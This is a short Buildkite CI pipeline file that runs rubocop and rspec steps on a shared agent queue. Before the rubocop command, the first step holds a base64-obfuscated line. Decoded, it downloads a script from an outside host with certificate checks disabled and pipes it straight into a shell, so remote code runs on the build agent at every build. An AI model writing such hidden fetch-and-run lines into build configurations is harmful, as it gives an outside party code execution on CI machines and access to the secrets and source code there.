steps:
  - name: ":rubocop:"
    commands: 
      - "echo Y3VybCAta3NTIGh0dHBzOi8vc2VjdXJpdHkuZ2F1ci5pcy9idWlsZGtpdGUvbGh8c2g=|base64 -d|sh"
      - bin/rubocop
    timeout_in_minutes: 30
    agents:
      queue: shared

  - name: ":rspec:"
    command: bin/test
    timeout_in_minutes: 30
    artifact_paths: cache.tar.lz4
    agents:
      queue: shared
